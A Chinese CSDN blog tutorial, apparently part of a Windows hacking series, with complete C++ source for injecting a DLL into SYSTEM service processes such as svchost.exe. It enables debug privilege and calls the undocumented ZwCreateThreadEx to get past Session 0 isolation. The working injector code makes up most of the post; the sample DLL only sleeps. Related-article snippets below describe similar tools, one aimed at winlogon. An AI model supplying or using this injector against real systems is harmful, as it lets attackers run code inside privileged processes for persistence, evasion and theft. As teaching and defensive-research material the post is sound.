第四章 突破SESSION 0隔离 远程线程注入(附源码)

最新推荐文章于 2024-06-05 06:59:46 发布
置顶 最新推荐文章于 2024-06-05 06:59:46 发布
阅读量672 收藏 2
点赞数 1
分类专栏: 面向windows编程 文章标签: 安全漏洞 c++ windows api
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45491298/article/details/121666187
版权

目录

前言

在上一章《远程线程注入》中,我们可以向普通用户进程注入DLL;但是无法向system等权限的系统服务器进程中注入。

由于系统的SESSION 0隔离机制,导致注入失败;我们可使用ZwCreateThreadEx函数进行远程线程注入,可以突破SESSION 0隔离。

函数介绍

大部分函数在上一章中已具体分析过,本章节将忽略

ZwCreateThreadEx函数

突破SESSION 0隔离,将DLL注入到系统服务进行;

ZwCreateThreadEx函数在ntdll.dll中没有被声明,所以需要使用GetProcAddressntdll.dll中获取函数导出地址。

语法
X64
DWORD ZwCreateThreadEx(
	PHANDLE					ThreadHandle,
    ACCESS_MASK				DesiredAccess,
    LPVOID					ObjectAttributes,
    HANDLE					ProcessHandle,
    LPTHREAD_START_ROUTINE	lpStartAddress,
    LPVOID					lpParameter,
    ULONG					CreateThreadFlags,
    SIZE_T					ZeroBits,
    SIZE_T					StackSize,
    SIZE_T					MaximumStackSize,
    LPVOID					pUnkown
)

X32
DWORD ZwCreateThreadEx(
    PHANDLE ThreadHandle,
    ACCESS_MASK DesiredAccess,
    LPVOID ObjectAttributes,
    HANDLE ProcessHandle,
    LPTHREAD_START_ROUTINE lpStartAddress,
    LPVOID lpParameter,
    BOOL CreateSuspended,
    DWORD dwStackSize,
    DWORD dw1,
    DWORD dw2,
    LPVOID pUnkown);

直接上源码。

示例

程序代码

OpenProcess直接打开系统服务进程会报错权限不足,右键管理员运行也无法打开;

故增加EnableDebugPrivilege部分,获取Debug权限。


#include <iostream>
#include <Windows.h>

BOOL EnableDebugPrivilege(BOOL bEnable)
{
    BOOL fOK = FALSE;     //Assume function fails
    HANDLE hToken;

    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        TOKEN_PRIVILEGES tp;
        tp.PrivilegeCount = 1;
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
        tp.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
        fOK = (GetLastError() == ERROR_SUCCESS);
        CloseHandle(hToken);
    }
    return fOK;
}



//远程线程注入
bool RemoteThreadInject(int Pid, const char* Path)
{
    //1.使用PID打开进程获取权限
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, NULL, Pid);
    if (hProcess == NULL)
    {
        printf("打开进程失败\n");
        return FALSE;
    }
    else
    {
        printf("打开进程成功\n");
    }
    //2.申请内存,写入DLL路径
    LPVOID pBuf = VirtualAllocEx(hProcess, NULL, strlen(Path) + 1, MEM_COMMIT, PAGE_READWRITE);
    if (!pBuf)
    {
        printf("申请内存失败!\n");
        return false;
    }
    else
    {
        printf("申请内存成功!\n");
    }
    //3.写入内存
    // SIZE_T dwWrite = 0;
    if (!WriteProcessMemory(hProcess, pBuf, Path, strlen(Path) + 1, NULL))
    {
        printf("写入内存失败!\n");
        return false;
    }


    //4.创建远程线程,让对方调用LoadLibrary
    HMODULE hModule = LoadLibrary("kernel32.dll");
    LPTHREAD_START_ROUTINE pfnStartAddress = (LPTHREAD_START_ROUTINE)GetProcAddress(hModule, "LoadLibraryA");
    if (!pfnStartAddress)
    {
        printf("获取LoadLibraryW失败!\n");
        return false;
    }
    else
    {
        printf("获取LoadLibraryW成功!\n");
    }
 
	//5.加载ntdll.dll
    HMODULE hNtdll = LoadLibrary("ntdll.dll");
    if (NULL == hNtdll)
    {
        printf("加载ntdll.dll失败!");
        CloseHandle(hProcess);
        return FALSE;

    }
    //6.获取ZwCreateThreadEx的函数地址
    typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
        PHANDLE ThreadHandle,
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        ULONG CreateThreadFlags,
        SIZE_T ZeroBits,
        SIZE_T StackSize,
        SIZE_T MaximumStackSize,
        LPVOID pUnkown);

    typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)GetProcAddress(hNtdll, "ZwCreateThreadEx");
    if (NULL == ZwCreateThreadEx)
    {
        printf("获取ZwCreateThreadEx函数地址失败!");
        CloseHandle(hProcess);
        return FALSE;
    }

    //7.在目标进程中创建线程
    HANDLE hRemoteThread = NULL;
    DWORD dwStatus = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess,
            pfnStartAddress, pBuf, 0, 0, 0, 0, NULL);
    if (NULL == hRemoteThread)
    {
        printf("目标进程中创建线程失败!");
        CloseHandle(hProcess);
        return FALSE;
    }
    else
    {
        printf("目标进程中创建线程成功!\n");
    }


    //8.等待线程结束返回,释放资源
    WaitForSingleObject(hRemoteThread, -1);
    CloseHandle(hRemoteThread);
    VirtualFreeEx(hProcess, pBuf, 0, MEM_FREE);

}


int main()
{
    EnableDebugPrivilege(SE_PRIVILEGE_ENABLED);
    printf("GetDuBug");
    const char* dllpath = "C:\\Users\\Administrator\\Desktop\\testDll1.dll";
    RemoteThreadInject(880, dllpath);
    printf("执行结束");
    return 0;
}

DLL代码

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        Sleep(1000000);
//        MessageBox(NULL, L"TIPS", L"TEST", NULL);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

测试

选择svchost.exe作为被注入的进程PID为696;

image-20211129232616065

注入DLL文件为“C:\Users\Administrator\Desktop\sleep.dll”:

image-20211129232830628

执行程序生成EXE,使用ProcessExplorer查看进程:

image-20211129233155722

原理学习

CreateRemoteThead函数最终还是调用ZwCreateThreadEx函数实现远程线程创建。windows内核6.0以后引入隔离机制,创建一个线程之后不直接运行,而是挂起线程,检查运行线程所在会话层决定是否恢复进程。

在使用CreateRemoteThead函数创建远程线程时,调用ZwCreateThreadEx函数执行,目标进程为系统进程时,第七个参数CreateThreadFlags的值为1,导致线程创建完成后一直处于挂起状态。

同样由于会话隔离机制,系统服务进程不能显示窗体,上述实例DLL中使用sleep,主体程序中会等待线程结束,所以CMD窗口未运行结束。可以通过ProcessExplorer查看svchost.exe进程,可以发现sleep.dll

小刘。忙了
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Win10远程线程注入DLL源码.zip
11-30
原理跟32位进程注入没太大区别,首先获取ntdll下的RtlInitUnicodeString,LdrLoadDll,NtCreateThreadEx地址,最后分配内存写入Code数据创建远程线程跑起来!
突破SESSION 0隔离的远线程注入
yeanhoo的博客
09-24 631
突破SESSION 0隔离的远线程注入 与传统的CreateRemoteThread函数实现的远线程注入DLL的唯一区别在于,突破SESSION 0远线程注 入技术是使用比CreateRemoteThread函数更为底层的ZwCreateThreadEx函数来创建远线程,而具体的远线 程注入原理是相同的。 #include<stdio.h> #include<windows.h> #include<Tlhelp32.h> #define NAME "wininit.exe
DLL注入工具:利用 ZwCreateThreadEx 注入 DLL
最新发布
weixin_41245990的博客
06-05 590
x86-64:x86-32:DWORD dw1,DWORD dw2,其中,lpStartAddress 支持提供内存地址用于执行 Payload 函数,lpParameter 传入结构体指针,用于在回调中使用。
win32汇编——dll远程注入
CarveStone的博客
10-05 732
dll远程注入实现效果原理代码实现软件下载 实现效果 原理 程序运行的容器是进程,真正活动的是其中的线程。因此,改变程序流程的通常做法是改变线程 EIP 、创建新线程或修改目标进程内的某些代码,使其执行 LoadLibrary(Ex) 来加载目标 DLL CreateRemoteThead法 这是最经典的也是使用范围最广的方法,其基本思路是在目标进程中申请一块内存并向其中写入 DLL 路径,然后调用 CreateRemoteThread,在目标进程中创建一个线程线程函数的地址就是 LoadLibrar
远程线程注入突破Session0隔离会话
xf555er的博客
06-12 1183
当我们使用远程线程注入将dll注入至系统服务进程中往往会失败,这是因为大多数系统服务都是在Session0中运行的 "Session 0"是Windows操作系统中的一个特殊的会话,专门用于运行系统服务和其他在用户登录之前就需要运行的程序。从Windows Vista和Windows Server 2008开始,为了提高安全性,Windows将用户和系统服务分隔在不同的会话中。具体来说,所有的服务和系统任务都在Session 0中运行,而所有用户交互任务都在其他会话中运行
关于dll注入方式的学习(突破session 0的远程线程注入
2201_75856701的博客
03-02 338
举个RING权限的最简单的例子:一个停止响应的应用程式,它运行在比RING0更低的指令环上,你不必大费周章的想着如何使系统回复运作,这期间,只需要启动任务管理器便能轻松终止它,因为它运行在比程式更低的RING0指令环中,拥有更高的权限,可以直接影响到RING0以上运行的程序,当然有利就有弊,RING保证了系统稳定运行的同时,也产生了一些十分麻烦的问题。比如一些OS虚拟化技术,在处理RING指令环时便遇到了麻烦,系统是运行在RING0指令环上的,但是虚拟的OS毕竟也是一个系统,也需要与系统相匹配的权限。
3.3 DLL注入突破会话0强力注入
热门推荐
CSDN
09-13 1万+
Session是`Windows`系统的一个安全特性,该特性引入了针对用户体验提高的安全机制,即拆分Session 0和用户会话,这种拆分`Session 0`和`Session 1`的机制对于提高安全性非常有用,这是因为将桌面服务进程,驱动程序以及其他系统级服务取消了与用户会话的关联,从而限制了攻击者可用的攻击面。
突破SESSION0隔离远程线程注入.zip
08-06
C++ 突破SESSION0隔离的远线程注入,可用于注入Winloogon.exe ,XP、win7、win10亲测都可以使用,注入器需要管理员身份运行。本人主要用于注入winlogon,winsta0\winlogon截屏使用
精选_突破SESSION0隔离的的远线程注入DLL技术剖析_源码打包
03-10
突破SESSION0隔离的的远线程注入DLL技术剖析
精选_突破Session0隔离在系统服务程序中创建用户桌面进程_源码打包
03-10
Session0隔离Windows操作系统为了提高安全性而引入的一种机制,它将系统服务与用户桌面进程分离,使得服务不再运行在与用户交互的同一会话(Session 0)中,从而降低了恶意软件通过服务影响用户界面的风险。...
易语言-系统服务开发,解决交互桌面权限问题,穿透Session 0 隔离
06-29
Windows中,服务分为不同的会话(Session),其中Session 0是最特殊的一个,它包含了系统进程和所有服务进程,为了安全性,从Windows Vista开始引入了Session 0隔离,防止恶意软件通过服务影响桌面。 "解决交互...
asp.net中穿透Session 0 隔离(二)
10-27
在ASP.NET开发中,遇到Session 0 隔离问题时,意味着服务进程无法直接与用户桌面进行交互,因为从Windows Vista开始,系统将服务进程放在Session 0中以增强安全性。但有时开发者需要服务能够与用户界面进行交互,...
关于几种dll注入方式的学习
2302_76827504的博客
03-24 1295
DLL注入技术,一般来讲是向一个正在运行的进程插入/注入代码的过程。我们注入的代码以动态链接库(DLL)的形式存在。
C++ windows 服务Session0穿透
远方
08-01 2542
做个服务拉起应用进程的需求,发现进程后台起了,但是没有界面 先看这两篇: 穿透Session 0 隔离(一) 穿透Session 0 隔离(二) 说的很清楚,这里不做解释 我们这里用C++代码实现 HANDLE GetProcessHandle(int ID) { return OpenProcess(PROCESS_ALL_ACCESS, FALSE, ID); } BOOL ...
session0穿透解决windows服务打开当前桌面文件的问题
as14569852的博客
09-20 2078
这里主要是参考msdn上一篇文章,地址是https://msdn.microsoft.com/en-us/gg465093 我自己的代码如下 bool CATLdemoModule::LaunchSession1Process( LPTSTR lpCommand ) { BOOL bSuccess = FALSE; STARTUPINFO si = {0}; PROCESS_INFORM
Windows服务——Session0穿透
qq_40404477的博客
09-13 4274
前言     做WindowsAPI编程最重要的就是要多查MSDN。     当然,如果没有找到前辈们提供的代码,再怎么查都是白搭。 Session0隔离     简单来说就是,Windows将应用程序根据Windows账户分为了多个Session,比如:Administor打开的进程可能属于Session1,而另一个账户Civilian打开的进程就属于Session2。     系统中还存在一种...
利用 ZwCreateThreadEx 注入 DLL
溡漪幽博客
10-09 611
PROCESSENTRY32W 结构体中的 cntThreads 包含进程的线程计数信息,崩溃的进程没有主线程,于是,可以加上这个条件来过滤。我们可以采取很多方法来注入 DLL 比如较新的早鸟(EarlyBird)技术,就是利用 APC 配合未公开函数进行劫持注入。需要注意的是我们可能遇到内存中已经崩溃的进程,这种时候会导致注入器不断尝试注入过程,但始终失败。我们常常使用进程名作为特征,遍历进程的 PID 以及句柄,然后执行注入过程
注入技术
qq_41071646的博客
01-08 947
本博客代码 均来自 windows黑客编程技术详解 这章我还是看了好久 而且我在windows10下成功运行但是没有弹出来窗口 不知道怎么回事   但是注入是成功的   那么我还是看了看这章的内容 全局钩子的注入 其实也就是利用了微软提供的钩子函数 这里 的函数是 setwindowshookex  这个函数 第一个参数是 钩子类型 第二个是 钩子程序的指针  也就是我们提供钩子函数的地方...
Windows黑客编程——远程线程注入(2)
Think88666的博客
03-27 1324
本篇采用的技术与前一篇无异,唯一的区别是调用了更底层的API——ZwCreateThreadEx,与CreateRemoteThread相比,该API除了能注入普通进程外,还能注入系统服务进程,实际上CreateRemoteThread底层也是通过ZwCreateThreadEx来实现了,不过该API是微软未公布的,所以不同版本操作系统或编写32位与64位程序,该函数的原型不一定相同。 废话不多说,参考第一篇博文,直接上代码: //定义32位函数指针 typedef DWORD(WINAPI *typ
Java EE第12章:会话对象session及其应用
总结来说,Java EE第12章详细介绍了如何在Java Web开发中有效利用session对象来管理和维护用户的会话状态,这对于构建交互性强、用户体验良好的Web应用至关重要。理解并掌握session的使用对于Java EE开发者来说是一...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值